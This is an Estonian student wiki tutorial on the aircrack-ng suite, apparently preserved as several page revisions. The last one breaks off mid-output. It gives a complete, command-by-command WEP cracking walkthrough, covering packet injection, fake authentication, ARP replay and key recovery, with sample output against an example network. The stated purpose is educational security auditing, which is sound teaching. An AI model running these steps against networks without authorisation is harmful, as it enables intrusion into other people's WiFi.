aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T09:23:39Z

Ktragel: /* Üldkirjeldus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisuse taset. aircrack-ng, ühe osana suurest tööriistakomplektist, on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

aircrack-ng on lihtne ja käepärane vahend, millega lahti murda ilma suurema vaevata WiFi-võrkude paroole. Õppe-eesmärgil on kindlasti vägagi asjakohane antud tööriistaga tutvust teha, sest üpris kiirelt saab selgeks, kuivõrd lihtne on tegelikult kellegi koduvõrku tungida manipuleerides andmepakettidega ja kasutades selleks vaid ~15 käsku.

=Kasutatud kirjandus=
<references />

=Autor=

Kelly Tragel [ISa 21] 
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
</table>

Aircrack

2015-05-26T09:20:58Z

Ktragel: /* Sissejuhatus */

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit, demonstreerides üht näitelahendust.

==Üldkirjeldus==

Aircrack-ng komplekt (ingl k. Aircrack-ng suite) on kogum tööriistasid, mis aitavad auditeerida traadita võrgu turvalisusetaset. aiaircrack-ng kui ühe osana suurest tööriistakomplektist on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]</ref>. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu<ref>[https://web.archive.org/web/20120805024038/http://www.grape-info.com/doc/linux/config/aircrack-ng-0.6.html Aircrack-ng (WEP, WPA-PSK Crack)]</ref>:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine<ref>[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]</ref>:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine<ref>[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]</ref>:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks<ref>[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]</ref>:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt<ref>[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]</ref>:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]</ref>:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]</ref>.

==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]</ref>: 
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]</ref> 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liides:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>
'''Märge:''' Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval ''airmon-ng stop athX'' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

'''Pane tähele!''' Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav ''airmon-ng stop ath0'' käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

'''Pane tähele!''' “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

'''Kontrolli:''' Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
 
 
 
'''Samm 2: Testime „süstimise“ suutlikkust pääsupunktile'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]</ref> 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:'' 
''-9 - “süstimise” test'' 
''-e teddy – raadiovõrgu nimi'' 
''-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress'' 
''ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

'''Pane tähele!''' Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.
 
 
 
'''Samm 3: Avada airodump-ng pakettide püüdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:'' 
''-c 9 – raadiovõrgu kanal'' 
''--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda'' 
''-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
 
 
'''Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]</ref> 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

''Selgitus:'' 
''-1 – võlts autentimine'' 
''0 – kordusühendus(t)e aeg sekundites'' 
''-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>

Ebaõnnestumise korral on tulemus:
<pre>8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
 
 
'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]</ref> 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>
 
 
'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks'''<ref>[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]</ref> 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
''-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub'' 
''output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
